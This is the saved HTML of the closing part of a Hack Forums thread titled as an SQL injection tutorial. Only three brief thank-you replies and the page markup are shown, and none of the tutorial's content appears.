href="http://www.hackforums.net/reputation.php?uid=1994305"><strong class="reputation_positive">18</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38558295">Very Nice Tutorial with good explanation of SQL queries also...... <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>Thanks for sharing..... <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"></div><div class="post_meta" id="post_meta_38558295"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1994305" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38558295" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38558628" id="pid38558628"></a><table class="tborder" style="margin-top: 5px; " id="post_38558628" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-25-2014, 10:32 AM <span id="edited_by_38558628"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38558628#pid38558628">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2019569"><span class="group2">janofer</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 24<br>Joined: Oct 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2019569"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38558628">Thank you. You helped me. Waiting for the next thing.</div><div class="post_meta" id="post_meta_38558628"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2019569" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38558628" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38598815" id="pid38598815"></a><table class="tborder" style="margin-top: 5px; " id="post_38598815" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-27-2014, 10:42 AM <span id="edited_by_38598815"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;pid=38598815#pid38598815">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2117844"><span class="group2">r0ml4h</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 6<br>Posts: 51<br>Joined: Jan 2014<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2117844"><strong class="reputation_positive">5</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38598815">it's important, i will bookmark this page</div><div class="post_meta" id="post_meta_38598815"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2117844" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039&amp;replyto=38598815" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=4082039&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=4082039" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=4082039">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=4082039" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4082039&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-4082039.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20Injecting%20after%20%27where%27%20part%20%28and%20before%20parameter%20value%29%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->